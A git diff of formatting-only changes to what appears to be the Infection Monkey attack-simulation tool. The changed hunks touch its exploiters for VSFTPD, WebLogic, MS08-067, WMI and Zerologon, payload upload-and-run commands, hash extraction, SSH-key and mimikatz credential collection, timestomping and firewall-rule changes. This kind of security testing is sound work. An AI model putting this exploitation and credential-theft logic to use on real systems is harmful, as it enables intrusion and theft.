http_thread.stop()
# Change permissions
change_permission = CHMOD_MONKEY % {"monkey_path":monkey_path}
change_permission = CHMOD_MONKEY % {"monkey_path": monkey_path}
change_permission = str.encode(str(change_permission) + "\n")
LOG.info("change_permission command is %s", change_permission)
backdoor_socket.send(change_permission)
@ -146,9 +146,9 @@ class VSFTPDExploiter(HostExploiter):
self.host, get_monkey_depth() - 1, vulnerable_port=FTP_PORT
)
run_monkey = RUN_MONKEY % {
"monkey_path":monkey_path,
"monkey_type":MONKEY_ARG,
"parameters":parameters,
"monkey_path": monkey_path,
"monkey_type": MONKEY_ARG,
"parameters": parameters,
}
# Set unlimited to memory


@ -52,9 +52,9 @@ class WebRCE(HostExploiter):
self.monkey_target_paths = monkey_target_paths
else:
self.monkey_target_paths = {
"linux":self._config.dropper_target_path_linux,
"win32":self._config.dropper_target_path_win_32,
"win64":self._config.dropper_target_path_win_64,
"linux": self._config.dropper_target_path_linux,
"win32": self._config.dropper_target_path_win_32,
"win64": self._config.dropper_target_path_win_64,
}
self.HTTP = [str(port) for port in self._config.HTTP_PORTS]
self.skip_exist = self._config.skip_exploit_if_file_exist
@ -170,7 +170,7 @@ class WebRCE(HostExploiter):
candidate_services = {}
candidate_services.update(
{
service:self.host.services[service]
service: self.host.services[service]
for service in self.host.services
if (
self.host.services[service]
@ -202,7 +202,7 @@ class WebRCE(HostExploiter):
else:
command = commands["windows"]
# Format command
command = command % {"monkey_path":path, "http_path":http_path}
command = command % {"monkey_path": path, "http_path": http_path}
except KeyError:
LOG.error(
"Provided command is missing/bad for this type of host! "
@ -372,8 +372,8 @@ class WebRCE(HostExploiter):
if not isinstance(resp, bool) and POWERSHELL_NOT_FOUND in resp:
LOG.info("Powershell not found in host. Using bitsadmin to download.")
backup_command = BITSADMIN_CMDLINE_HTTP % {
"monkey_path":dest_path,
"http_path":http_path,
"monkey_path": dest_path,
"http_path": http_path,
}
T1197Telem(ScanStatus.USED, self.host, BITS_UPLOAD_STRING).send()
resp = self.exploit(url, backup_command)
@ -402,7 +402,7 @@ class WebRCE(HostExploiter):
LOG.info("Started http server on %s", http_path)
# Choose command:
if not commands:
commands = {"windows":POWERSHELL_HTTP_UPLOAD, "linux":WGET_HTTP_UPLOAD}
commands = {"windows": POWERSHELL_HTTP_UPLOAD, "linux": WGET_HTTP_UPLOAD}
command = self.get_command(paths["dest_path"], http_path, commands)
resp = self.exploit(url, command)
self.add_executed_cmd(command)
@ -415,7 +415,7 @@ class WebRCE(HostExploiter):
if resp is False:
return resp
else:
return {"response":resp, "path":paths["dest_path"]}
return {"response": resp, "path": paths["dest_path"]}
def change_permissions(self, url, path, command=None):
"""
@ -430,7 +430,7 @@ class WebRCE(HostExploiter):
LOG.info("Permission change not required for windows")
return True
if not command:
command = CHMOD_MONKEY % {"monkey_path":path}
command = CHMOD_MONKEY % {"monkey_path": path}
try:
resp = self.exploit(url, command)
T1222Telem(ScanStatus.USED, command, self.host).send()
@ -448,8 +448,7 @@ class WebRCE(HostExploiter):
return False
elif "No such file or directory" in resp:
LOG.error(
"Could not change permission because monkey was not found. Check path "
"parameter."
"Could not change permission because monkey was not found. Check path " "parameter."
)
return False
LOG.info("Permission change finished")
@ -474,18 +473,18 @@ class WebRCE(HostExploiter):
self.host, get_monkey_depth() - 1, self.vulnerable_port, default_path
)
command = RUN_MONKEY % {
"monkey_path":path,
"monkey_type":DROPPER_ARG,
"parameters":monkey_cmd,
"monkey_path": path,
"monkey_type": DROPPER_ARG,
"parameters": monkey_cmd,
}
else:
monkey_cmd = build_monkey_commandline(
self.host, get_monkey_depth() - 1, self.vulnerable_port
)
command = RUN_MONKEY % {
"monkey_path":path,
"monkey_type":MONKEY_ARG,
"parameters":monkey_cmd,
"monkey_path": path,
"monkey_type": MONKEY_ARG,
"parameters": monkey_cmd,
}
try:
LOG.info("Trying to execute monkey using command: {}".format(command))
@ -556,7 +555,7 @@ class WebRCE(HostExploiter):
dest_path = self.get_monkey_upload_path(src_path)
if not dest_path:
return False
return {"src_path":src_path, "dest_path":dest_path}
return {"src_path": src_path, "dest_path": dest_path}
def get_default_dropper_path(self):
"""

View File

@ -24,8 +24,8 @@ REQUEST_TIMEOUT = 5
EXECUTION_TIMEOUT = 15
# Malicious requests' headers:
HEADERS = {
"Content-Type":"text/xml;charset=UTF-8",
"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) "
"Content-Type": "text/xml;charset=UTF-8",
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) "
"AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36",
}
@ -65,7 +65,7 @@ class WebLogic201710271(WebRCE):
def __init__(self, host):
super(WebLogic201710271, self).__init__(
host, {"linux":"/tmp/monkey.sh", "win32":"monkey32.exe", "win64":"monkey64.exe"}
host, {"linux": "/tmp/monkey.sh", "win32": "monkey32.exe", "win64": "monkey64.exe"}
)
def get_exploit_config(self):
@ -292,7 +292,7 @@ class WebLogic20192725(WebRCE):
return False
def check_if_exploitable(self, url):
headers = copy.deepcopy(HEADERS).update({"SOAPAction":""})
headers = copy.deepcopy(HEADERS).update({"SOAPAction": ""})
res = post(url, headers=headers, timeout=EXECUTION_TIMEOUT)
if res.status_code == 500 and "<faultcode>env:Client</faultcode>" in res.text:
return True

View File

@ -192,9 +192,9 @@ class Ms08_067_Exploiter(HostExploiter):
_TARGET_OS_TYPE = ["windows"]
_EXPLOITED_SERVICE = "Microsoft Server Service"
_windows_versions = {
"Windows Server 2003 3790 Service Pack 2":WindowsVersion.Windows2003_SP2,
"Windows Server 2003 R2 3790 Service Pack 2":WindowsVersion.Windows2003_SP2,
"Windows 5.1":WindowsVersion.WindowsXP,
"Windows Server 2003 3790 Service Pack 2": WindowsVersion.Windows2003_SP2,
"Windows Server 2003 R2 3790 Service Pack 2": WindowsVersion.Windows2003_SP2,
"Windows 5.1": WindowsVersion.WindowsXP,
}
def __init__(self, host):
@ -286,7 +286,7 @@ class Ms08_067_Exploiter(HostExploiter):
# execute the remote dropper in case the path isn't final
if remote_full_path.lower() != self._config.dropper_target_path_win_32.lower():
cmdline = DROPPER_CMDLINE_WINDOWS % {
"dropper_path":remote_full_path
"dropper_path": remote_full_path
} + build_monkey_commandline(
self.host,
get_monkey_depth() - 1,
@ -295,7 +295,7 @@ class Ms08_067_Exploiter(HostExploiter):
)
else:
cmdline = MONKEY_CMDLINE_WINDOWS % {
"monkey_path":remote_full_path
"monkey_path": remote_full_path
} + build_monkey_commandline(
self.host, get_monkey_depth() - 1, vulnerable_port=SRVSVC_Exploit.TELNET_PORT
)

View File

@ -66,9 +66,7 @@ class WmiExploiter(HostExploiter):
continue
except socket.error:
LOG.debug(
(
"Network error in WMI connection to %r with " % self.host) +
creds_for_logging
("Network error in WMI connection to %r with " % self.host) + creds_for_logging
)
return False
except Exception as exc:
@ -112,7 +110,7 @@ class WmiExploiter(HostExploiter):
# execute the remote dropper in case the path isn't final
elif remote_full_path.lower() != self._config.dropper_target_path_win_32.lower():
cmdline = DROPPER_CMDLINE_WINDOWS % {
"dropper_path":remote_full_path
"dropper_path": remote_full_path
} + build_monkey_commandline(
self.host,
get_monkey_depth() - 1,
@ -121,7 +119,7 @@ class WmiExploiter(HostExploiter):
)
else:
cmdline = MONKEY_CMDLINE_WINDOWS % {
"monkey_path":remote_full_path
"monkey_path": remote_full_path
} + build_monkey_commandline(
self.host, get_monkey_depth() - 1, WmiExploiter.VULNERABLE_PORT
)

View File

@ -253,9 +253,9 @@ class ZerologonExploiter(HostExploiter):
user_RID, lmhash, nthash = parts_of_secret[1:4]
self._extracted_creds[user] = {
"RID":int(user_RID), # relative identifier
"lm_hash":lmhash,
"nt_hash":nthash,
"RID": int(user_RID), # relative identifier
"lm_hash": lmhash,
"nt_hash": nthash,
}
def store_extracted_creds_for_exploitation(self) -> None:
@ -274,11 +274,11 @@ class ZerologonExploiter(HostExploiter):
def add_extracted_creds_to_exploit_info(self, user: str, lmhash: str, nthash: str) -> None:
self.exploit_info["credentials"].update(
{
user:{
"username":user,
"password":"",
"lm_hash":lmhash,
"ntlm_hash":nthash,
user: {
"username": user,
"password": "",
"lm_hash": lmhash,
"ntlm_hash": nthash,
}
}
)
@ -331,8 +331,7 @@ class ZerologonExploiter(HostExploiter):
)
wmiexec = Wmiexec(
ip=self.dc_ip, username=username, hashes=":".join(user_pwd_hashes),
domain=self.dc_ip
ip=self.dc_ip, username=username, hashes=":".join(user_pwd_hashes), domain=self.dc_ip
)
remote_shell = wmiexec.get_remote_shell()

View File

@ -22,24 +22,24 @@ __author__ = "itamar"
LOG = None
LOG_CONFIG = {
"version":1,
"disable_existing_loggers":False,
"formatters":{
"standard":{
"format":"%(asctime)s [%(process)d:%(thread)d:%(levelname)s] %(module)s.%("
"version": 1,
"disable_existing_loggers": False,
"formatters": {
"standard": {
"format": "%(asctime)s [%(process)d:%(thread)d:%(levelname)s] %(module)s.%("
"funcName)s.%(lineno)d: %(message)s"
},
},
"handlers":{
"console":{"class":"logging.StreamHandler", "level":"DEBUG", "formatter":"standard"},
"file":{
"class":"logging.FileHandler",
"level":"DEBUG",
"formatter":"standard",
"filename":None,
"handlers": {
"console": {"class": "logging.StreamHandler", "level": "DEBUG", "formatter": "standard"},
"file": {
"class": "logging.FileHandler",
"level": "DEBUG",
"formatter": "standard",
"filename": None,
},
},
"root":{"level":"DEBUG", "handlers":["console"]},
"root": {"level": "DEBUG", "handlers": ["console"]},
}
@ -128,8 +128,7 @@ def main():
sys.excepthook = log_uncaught_exceptions
LOG.info(
">>>>>>>>>> Initializing monkey (%s): PID %s <<<<<<<<<<", monkey_cls.__name__,
os.getpid()
">>>>>>>>>> Initializing monkey (%s): PID %s <<<<<<<<<<", monkey_cls.__name__, os.getpid()
)
LOG.info(f"version: {get_version()}")

View File

@ -100,8 +100,7 @@ class InfectionMonkey(object):
WormConfiguration.command_servers.insert(0, self._default_server)
else:
LOG.debug(
"Default server: %s is already in command servers list" %
self._default_server
"Default server: %s is already in command servers list" % self._default_server
)
def start(self):
@ -220,7 +219,7 @@ class InfectionMonkey(object):
# Order exploits according to their type
self._exploiters = sorted(
self._exploiters, key=lambda exploiter_:exploiter_.EXPLOIT_TYPE.value
self._exploiters, key=lambda exploiter_: exploiter_.EXPLOIT_TYPE.value
)
host_exploited = False
for exploiter in [exploiter(machine) for exploiter in self._exploiters]:
@ -252,8 +251,7 @@ class InfectionMonkey(object):
if len(self._exploited_machines) > 0:
time_to_sleep = WormConfiguration.keep_tunnel_open_time
LOG.info(
"Sleeping %d seconds for exploited machines to connect to tunnel",
time_to_sleep
"Sleeping %d seconds for exploited machines to connect to tunnel", time_to_sleep
)
time.sleep(time_to_sleep)
@ -346,7 +344,7 @@ class InfectionMonkey(object):
startupinfo.dwFlags = CREATE_NEW_CONSOLE | STARTF_USESHOWWINDOW
startupinfo.wShowWindow = SW_HIDE
subprocess.Popen(
DELAY_DELETE_CMD % {"file_path":sys.executable},
DELAY_DELETE_CMD % {"file_path": sys.executable},
stdin=None,
stdout=None,
stderr=None,
@ -398,8 +396,7 @@ class InfectionMonkey(object):
return True
else:
LOG.info(
"Failed exploiting %r with exploiter %s", machine,
exploiter.__class__.__name__
"Failed exploiting %r with exploiter %s", machine, exploiter.__class__.__name__
)
except ExploitingVulnerableMachineError as exc:
LOG.error(
@ -458,8 +455,7 @@ class InfectionMonkey(object):
"""
if not ControlClient.find_server(default_tunnel=self._default_tunnel):
raise PlannedShutdownException(
"Monkey couldn't find server with {} default tunnel.".format(
self._default_tunnel)
"Monkey couldn't find server with {} default tunnel.".format(self._default_tunnel)
)
self._default_server = WormConfiguration.current_server
LOG.debug("default server set to: %s" % self._default_server)

View File

@ -58,7 +58,7 @@ class WinAdvFirewall(FirewallApp):
def add_firewall_rule(
self, name="Firewall", direction="in", action="allow", program=sys.executable, **kwargs
):
netsh_args = {"name":name, "dir":direction, "action":action, "program":program}
netsh_args = {"name": name, "dir": direction, "action": action, "program": program}
netsh_args.update(kwargs)
try:
if _run_netsh_cmd("advfirewall firewall add rule", netsh_args):
@ -70,7 +70,7 @@ class WinAdvFirewall(FirewallApp):
return None
def remove_firewall_rule(self, name="Firewall", **kwargs):
netsh_args = {"name":name}
netsh_args = {"name": name}
netsh_args.update(kwargs)
try:
@ -132,7 +132,7 @@ class WinFirewall(FirewallApp):
program=sys.executable,
**kwargs,
):
netsh_args = {"name":name, "mode":mode, "program":program}
netsh_args = {"name": name, "mode": mode, "program": program}
netsh_args.update(kwargs)
try:
@ -153,7 +153,7 @@ class WinFirewall(FirewallApp):
program=sys.executable,
**kwargs,
):
netsh_args = {"program":program}
netsh_args = {"program": program}
netsh_args.update(kwargs)
try:
if _run_netsh_cmd("firewall delete %s" % rule, netsh_args):

View File

@ -52,7 +52,6 @@ if is_windows_os():
local_hostname = socket.gethostname()
return socket.gethostbyname_ex(local_hostname)[2]
def get_routes():
raise NotImplementedError()
@ -60,12 +59,10 @@ if is_windows_os():
else:
from fcntl import ioctl
def local_ips():
valid_ips = [network["addr"] for network in get_host_subnets()]
return valid_ips
def get_routes(): # based on scapy implementation for route parsing
try:
f = open("/proc/net/route", "r")

View File

@ -17,21 +17,21 @@ class PostgreSQLFinger(HostFinger):
# Class related consts
_SCANNED_SERVICE = "PostgreSQL"
POSTGRESQL_DEFAULT_PORT = 5432
CREDS = {"username":ID_STRING, "password":ID_STRING}
CREDS = {"username": ID_STRING, "password": ID_STRING}
CONNECTION_DETAILS = {
"ssl_conf":"SSL is configured on the PostgreSQL server.\n",
"ssl_not_conf":"SSL is NOT configured on the PostgreSQL server.\n",
"all_ssl":"SSL connections can be made by all.\n",
"all_non_ssl":"Non-SSL connections can be made by all.\n",
"selected_ssl":"SSL connections can be made by selected hosts only OR "
"ssl_conf": "SSL is configured on the PostgreSQL server.\n",
"ssl_not_conf": "SSL is NOT configured on the PostgreSQL server.\n",
"all_ssl": "SSL connections can be made by all.\n",
"all_non_ssl": "Non-SSL connections can be made by all.\n",
"selected_ssl": "SSL connections can be made by selected hosts only OR "
"non-SSL usage is forced.\n",
"selected_non_ssl":"Non-SSL connections can be made by selected hosts only OR "
"selected_non_ssl": "Non-SSL connections can be made by selected hosts only OR "
"SSL usage is forced.\n",
"only_selected":"Only selected hosts can make connections (SSL or non-SSL).\n",
"only_selected": "Only selected hosts can make connections (SSL or non-SSL).\n",
}
RELEVANT_EX_SUBSTRINGS = {
"no_auth":"password authentication failed",
"no_entry":"entry for host", # "no pg_hba.conf entry for host" but filename may be diff
"no_auth": "password authentication failed",
"no_entry": "entry for host", # "no pg_hba.conf entry for host" but filename may be diff
}
def get_host_fingerprint(self, host):

View File

@ -169,7 +169,7 @@ class SMBFinger(HostFinger):
os_version, service_client = tuple(
[
e.replace(b"\x00", b"").decode()
for e in data[47 + length:].split(b"\x00\x00\x00")[:2]
for e in data[47 + length :].split(b"\x00\x00\x00")[:2]
]
)

View File

@ -5,35 +5,35 @@ from infection_monkey.network.postgresql_finger import PostgreSQLFinger
IRRELEVANT_EXCEPTION_STRING = "This is an irrelevant exception string."
_RELEVANT_EXCEPTION_STRING_PARTS = {
"pwd_auth_failed":'FATAL: password authentication failed for user "root"',
"ssl_on_entry_not_found":'FATAL: no pg_hba.conf entry for host "127.0.0.1",'
"pwd_auth_failed": 'FATAL: password authentication failed for user "root"',
"ssl_on_entry_not_found": 'FATAL: no pg_hba.conf entry for host "127.0.0.1",'
'user "random", database "postgres", SSL on',
"ssl_off_entry_not_found":'FATAL: no pg_hba.conf entry for host "127.0.0.1",'
"ssl_off_entry_not_found": 'FATAL: no pg_hba.conf entry for host "127.0.0.1",'
'user "random", database "postgres", SSL off',
}
_RELEVANT_EXCEPTION_STRINGS = {
"pwd_auth_failed":_RELEVANT_EXCEPTION_STRING_PARTS["pwd_auth_failed"],
"ssl_off_entry_not_found":_RELEVANT_EXCEPTION_STRING_PARTS["ssl_off_entry_not_found"],
"pwd_auth_failed_pwd_auth_failed":"\n".join(
"pwd_auth_failed": _RELEVANT_EXCEPTION_STRING_PARTS["pwd_auth_failed"],
"ssl_off_entry_not_found": _RELEVANT_EXCEPTION_STRING_PARTS["ssl_off_entry_not_found"],
"pwd_auth_failed_pwd_auth_failed": "\n".join(
[
_RELEVANT_EXCEPTION_STRING_PARTS["pwd_auth_failed"],
_RELEVANT_EXCEPTION_STRING_PARTS["pwd_auth_failed"],
]
),
"pwd_auth_failed_ssl_off_entry_not_found":"\n".join(
"pwd_auth_failed_ssl_off_entry_not_found": "\n".join(
[
_RELEVANT_EXCEPTION_STRING_PARTS["pwd_auth_failed"],
_RELEVANT_EXCEPTION_STRING_PARTS["ssl_off_entry_not_found"],
]
),
"ssl_on_entry_not_found_pwd_auth_failed":"\n".join(
"ssl_on_entry_not_found_pwd_auth_failed": "\n".join(
[
_RELEVANT_EXCEPTION_STRING_PARTS["ssl_on_entry_not_found"],
_RELEVANT_EXCEPTION_STRING_PARTS["pwd_auth_failed"],
]
),
"ssl_on_entry_not_found_ssl_off_entry_not_found":"\n".join(
"ssl_on_entry_not_found_ssl_off_entry_not_found": "\n".join(
[
_RELEVANT_EXCEPTION_STRING_PARTS["ssl_on_entry_not_found"],
_RELEVANT_EXCEPTION_STRING_PARTS["ssl_off_entry_not_found"],
@ -42,48 +42,48 @@ _RELEVANT_EXCEPTION_STRINGS = {
}
_RESULT_STRINGS = {
"ssl_conf":"SSL is configured on the PostgreSQL server.\n",
"ssl_not_conf":"SSL is NOT configured on the PostgreSQL server.\n",
"all_ssl":"SSL connections can be made by all.\n",
"all_non_ssl":"Non-SSL connections can be made by all.\n",
"selected_ssl":"SSL connections can be made by selected hosts only OR "
"ssl_conf": "SSL is configured on the PostgreSQL server.\n",
"ssl_not_conf": "SSL is NOT configured on the PostgreSQL server.\n",
"all_ssl": "SSL connections can be made by all.\n",
"all_non_ssl": "Non-SSL connections can be made by all.\n",
"selected_ssl": "SSL connections can be made by selected hosts only OR "
"non-SSL usage is forced.\n",
"selected_non_ssl":"Non-SSL connections can be made by selected hosts only OR "
"selected_non_ssl": "Non-SSL connections can be made by selected hosts only OR "
"SSL usage is forced.\n",
"only_selected":"Only selected hosts can make connections (SSL or non-SSL).\n",
"only_selected": "Only selected hosts can make connections (SSL or non-SSL).\n",
}
RELEVANT_EXCEPTIONS_WITH_EXPECTED_RESULTS = {
# SSL not configured, all non-SSL allowed
_RELEVANT_EXCEPTION_STRINGS["pwd_auth_failed"]:[
_RELEVANT_EXCEPTION_STRINGS["pwd_auth_failed"]: [
_RESULT_STRINGS["ssl_not_conf"],
_RESULT_STRINGS["all_non_ssl"],
],
# SSL not configured, selected non-SSL allowed
_RELEVANT_EXCEPTION_STRINGS["ssl_off_entry_not_found"]:[
_RELEVANT_EXCEPTION_STRINGS["ssl_off_entry_not_found"]: [
_RESULT_STRINGS["ssl_not_conf"],
_RESULT_STRINGS["selected_non_ssl"],
],
# all SSL allowed, all non-SSL allowed
_RELEVANT_EXCEPTION_STRINGS["pwd_auth_failed_pwd_auth_failed"]:[
_RELEVANT_EXCEPTION_STRINGS["pwd_auth_failed_pwd_auth_failed"]: [
_RESULT_STRINGS["ssl_conf"],
_RESULT_STRINGS["all_ssl"],
_RESULT_STRINGS["all_non_ssl"],
],
# all SSL allowed, selected non-SSL allowed
_RELEVANT_EXCEPTION_STRINGS["pwd_auth_failed_ssl_off_entry_not_found"]:[
_RELEVANT_EXCEPTION_STRINGS["pwd_auth_failed_ssl_off_entry_not_found"]: [
_RESULT_STRINGS["ssl_conf"],
_RESULT_STRINGS["all_ssl"],
_RESULT_STRINGS["selected_non_ssl"],
],
# selected SSL allowed, all non-SSL allowed
_RELEVANT_EXCEPTION_STRINGS["ssl_on_entry_not_found_pwd_auth_failed"]:[
_RELEVANT_EXCEPTION_STRINGS["ssl_on_entry_not_found_pwd_auth_failed"]: [
_RESULT_STRINGS["ssl_conf"],
_RESULT_STRINGS["selected_ssl"],
_RESULT_STRINGS["all_non_ssl"],
],
# selected SSL allowed, selected non-SSL allowed
_RELEVANT_EXCEPTION_STRINGS["ssl_on_entry_not_found_ssl_off_entry_not_found"]:[
_RELEVANT_EXCEPTION_STRINGS["ssl_on_entry_not_found_ssl_off_entry_not_found"]: [
_RESULT_STRINGS["ssl_conf"],
_RESULT_STRINGS["only_selected"],
],

View File

@ -81,8 +81,7 @@ class CommunicateAsNewUser(PBA):
"""
if exit_status == 0:
PostBreachTelem(
self,
(CREATED_PROCESS_AS_USER_SUCCESS_FORMAT.format(commandline, username), True)
self, (CREATED_PROCESS_AS_USER_SUCCESS_FORMAT.format(commandline, username), True)
).send()
else:
PostBreachTelem(

View File

@ -9,6 +9,5 @@ class AccountDiscovery(PBA):
def __init__(self):
linux_cmds, windows_cmds = get_commands_to_discover_accounts()
super().__init__(
POST_BREACH_ACCOUNT_DISCOVERY, linux_cmd=" ".join(linux_cmds),
windows_cmd=windows_cmds
POST_BREACH_ACCOUNT_DISCOVERY, linux_cmd=" ".join(linux_cmds), windows_cmd=windows_cmds
)

View File

@ -62,8 +62,7 @@ class PBA(Plugin):
result = exec_funct()
if self.scripts_were_used_successfully(result):
T1064Telem(
ScanStatus.USED,
f"Scripts were used to execute {self.name} post breach action."
ScanStatus.USED, f"Scripts were used to execute {self.name} post breach action."
).send()
PostBreachTelem(self, result).send()
else:

View File

@ -1,9 +1,7 @@
from infection_monkey.post_breach.shell_startup_files.linux.shell_startup_files_modification\
import (
from infection_monkey.post_breach.shell_startup_files.linux.shell_startup_files_modification import (
get_linux_commands_to_modify_shell_startup_files,
)
from infection_monkey.post_breach.shell_startup_files.windows.shell_startup_files_modification\
import (
from infection_monkey.post_breach.shell_startup_files.windows.shell_startup_files_modification import (
get_windows_commands_to_modify_shell_startup_files,
)

View File

@ -19,8 +19,7 @@ def get_windows_commands_to_modify_shell_startup_files():
STARTUP_FILES_PER_USER = [
"\\".join(
SHELL_STARTUP_FILE_PATH_COMPONENTS[:2] + [
user] + SHELL_STARTUP_FILE_PATH_COMPONENTS[3:]
SHELL_STARTUP_FILE_PATH_COMPONENTS[:2] + [user] + SHELL_STARTUP_FILE_PATH_COMPONENTS[3:]
)
for user in USERS
]

View File

@ -13,7 +13,7 @@ CUSTOM_WINDOWS_FILENAME = "filename-for-windows"
def fake_monkey_dir_path(monkeypatch):
monkeypatch.setattr(
"infection_monkey.post_breach.actions.users_custom_pba.get_monkey_dir_path",
lambda:MONKEY_DIR_PATH,
lambda: MONKEY_DIR_PATH,
)
@ -21,7 +21,7 @@ def fake_monkey_dir_path(monkeypatch):
def set_os_linux(monkeypatch):
monkeypatch.setattr(
"infection_monkey.post_breach.actions.users_custom_pba.is_windows_os",
lambda:False,
lambda: False,
)
@ -29,7 +29,7 @@ def set_os_linux(monkeypatch):
def set_os_windows(monkeypatch):
monkeypatch.setattr(
"infection_monkey.post_breach.actions.users_custom_pba.is_windows_os",
lambda:True,
lambda: True,
)

View File

@ -10,5 +10,6 @@ def get_linux_timestomping_commands():
f"rm {TEMP_FILE} -f"
]
# Commands' source: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006
# /T1070.006.md

View File

@ -4,5 +4,6 @@ TEMP_FILE = "monkey-timestomping-file.txt"
def get_windows_timestomping_commands():
return "powershell.exe infection_monkey/post_breach/timestomping/windows/timestomping.ps1"
# Commands' source: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006
# /T1070.006.md

View File

@ -38,11 +38,11 @@ class SSHCollector(object):
possibly hashed)
"""
return {
"name":name,
"home_dir":home_dir,
"public_key":None,
"private_key":None,
"known_hosts":None,
"name": name,
"home_dir": home_dir,
"public_key": None,
"private_key": None,
"known_hosts": None,
}
@staticmethod
@ -84,8 +84,7 @@ class SSHCollector(object):
info["private_key"] = private_key
LOG.info("Found private key in %s" % private)
T1005Telem(
ScanStatus.USED, "SSH key",
"Path: %s" % private
ScanStatus.USED, "SSH key", "Path: %s" % private
).send()
else:
continue

View File

@ -80,8 +80,8 @@ class InfoCollector(object):
"""
LOG.debug("Reading subnets")
self.info["network_info"] = {
"networks":get_host_subnets(),
"netstat":NetstatCollector.get_netstat_info(),
"networks": get_host_subnets(),
"netstat": NetstatCollector.get_netstat_info(),
}
def get_azure_info(self):

View File

@ -31,7 +31,7 @@ class AwsCollector(SystemInfoCollector):
info = {}
if aws.is_instance():
logger.info("Machine is an AWS instance")
info = {"instance_id":aws.get_instance_id()}
info = {"instance_id": aws.get_instance_id()}
else:
logger.info("Machine is NOT an AWS instance")

View File

@ -21,4 +21,4 @@ class EnvironmentCollector(SystemInfoCollector):
super().__init__(name=ENVIRONMENT_COLLECTOR)
def collect(self) -> dict:
return {"environment":get_monkey_environment()}
return {"environment": get_monkey_environment()}

View File

@ -12,4 +12,4 @@ class HostnameCollector(SystemInfoCollector):
super().__init__(name=HOSTNAME_COLLECTOR)
def collect(self) -> dict:
return {"hostname":socket.getfqdn()}
return {"hostname": socket.getfqdn()}

View File

@ -30,23 +30,23 @@ class ProcessListCollector(SystemInfoCollector):
for process in psutil.process_iter():
try:
processes[process.pid] = {
"name":process.name(),
"pid":process.pid,
"ppid":process.ppid(),
"cmdline":" ".join(process.cmdline()),
"full_image_path":process.exe(),
"name": process.name(),
"pid": process.pid,
"ppid": process.ppid(),
"cmdline": " ".join(process.cmdline()),
"full_image_path": process.exe(),
}
except (psutil.AccessDenied, WindowsError):
# we may be running as non root and some processes are impossible to acquire in
# Windows/Linux.
# In this case we'll just add what we know.
processes[process.pid] = {
"name":"null",
"pid":process.pid,
"ppid":process.ppid(),
"cmdline":"ACCESS DENIED",
"full_image_path":"null",
"name": "null",
"pid": process.pid,
"ppid": process.ppid(),
"cmdline": "ACCESS DENIED",
"full_image_path": "null",
}
continue
return {"process_list":processes}
return {"process_list": processes}

View File

@ -20,10 +20,10 @@ class NetstatCollector(object):
AF_INET6 = getattr(socket, "AF_INET6", object())
proto_map = {
(AF_INET, SOCK_STREAM):"tcp",
(AF_INET6, SOCK_STREAM):"tcp6",
(AF_INET, SOCK_DGRAM):"udp",
(AF_INET6, SOCK_DGRAM):"udp6",
(AF_INET, SOCK_STREAM): "tcp",
(AF_INET6, SOCK_STREAM): "tcp6",
(AF_INET, SOCK_DGRAM): "udp",
(AF_INET6, SOCK_DGRAM): "udp6",
}
@staticmethod
@ -34,11 +34,11 @@ class NetstatCollector(object):
@staticmethod
def _parse_connection(c):
return {
"proto":NetstatCollector.proto_map[(c.family, c.type)],
"local_address":c.laddr[0],
"local_port":c.laddr[1],
"remote_address":c.raddr[0] if c.raddr else None,
"remote_port":c.raddr[1] if c.raddr else None,
"status":c.status,
"pid":c.pid,
"proto": NetstatCollector.proto_map[(c.family, c.type)],
"local_address": c.laddr[0],
"local_port": c.laddr[1],
"remote_address": c.raddr[0] if c.raddr else None,
"remote_port": c.raddr[1] if c.raddr else None,
"status": c.status,
"pid": c.pid,
}

View File

@ -28,7 +28,7 @@ class SystemInfoCollectorsHandler(object):
"collected successfully.".format(len(self.collectors_list), successful_collections)
)
SystemInfoTelem({"collectors":system_info_telemetry}).send()
SystemInfoTelem({"collectors": system_info_telemetry}).send()
@staticmethod
def config_to_collectors_list() -> Sequence[SystemInfoCollector]:

View File

@ -22,5 +22,5 @@ class MimikatzCredentialCollector(object):
# Lets not use "." and "$" in keys, because it will confuse mongo.
# Ideally we should refactor island not to use a dict and simply parse credential list.
key = cred.username.replace(".", ",").replace("$", "")
cred_dict.update({key:cred.to_dict()})
cred_dict.update({key: cred.to_dict()})
return cred_dict

View File

@ -8,123 +8,119 @@ from infection_monkey.system_info.windows_cred_collector.pypykatz_handler import
class TestPypykatzHandler(TestCase):
# Made up credentials, but structure of dict should be roughly the same
PYPYKATZ_SESSION = {
"authentication_id":555555,
"session_id":3,
"username":"Monkey",
"domainname":"ReAlDoMaIn",
"logon_server":"ReAlDoMaIn",
"logon_time":"2020-06-02T04:53:45.256562+00:00",
"sid":"S-1-6-25-260123139-3611579848-5589493929-3021",
"luid":123086,
"msv_creds":[
"authentication_id": 555555,
"session_id": 3,
"username": "Monkey",
"domainname": "ReAlDoMaIn",
"logon_server": "ReAlDoMaIn",
"logon_time": "2020-06-02T04:53:45.256562+00:00",
"sid": "S-1-6-25-260123139-3611579848-5589493929-3021",
"luid": 123086,
"msv_creds": [
{
"username":"monkey",
"domainname":"ReAlDoMaIn",
"NThash":b"1\xb7<Y\xd7\xe0\xc0\x89\xc01\xd6\xcf\xe0\xd1j\xe9",
"LMHash":None,
"SHAHash":b"\x18\x90\xaf\xd8\x07\t\xda9\xa3\xee^kK\r2U\xbf\xef\x95`",
"username": "monkey",
"domainname": "ReAlDoMaIn",
"NThash": b"1\xb7<Y\xd7\xe0\xc0\x89\xc01\xd6\xcf\xe0\xd1j\xe9",
"LMHash": None,
"SHAHash": b"\x18\x90\xaf\xd8\x07\t\xda9\xa3\xee^kK\r2U\xbf\xef\x95`",
}
],
"wdigest_creds":[
"wdigest_creds": [
{
"credtype":"wdigest",
"username":"monkey",
"domainname":"ReAlDoMaIn",
"password":"canyoufindme",
"luid":123086,
"credtype": "wdigest",
"username": "monkey",
"domainname": "ReAlDoMaIn",
"password": "canyoufindme",
"luid": 123086,
}
],
"ssp_creds":[
"ssp_creds": [
{
"credtype":"wdigest",
"username":"monkey123",
"domainname":"ReAlDoMaIn",
"password":"canyoufindme123",
"luid":123086,
"credtype": "wdigest",
"username": "monkey123",
"domainname": "ReAlDoMaIn",
"password": "canyoufindme123",
"luid": 123086,
}
],
"livessp_creds":[
"livessp_creds": [
{
"credtype":"wdigest",
"username":"monk3y",
"domainname":"ReAlDoMaIn",
"password":"canyoufindm3",
"luid":123086,
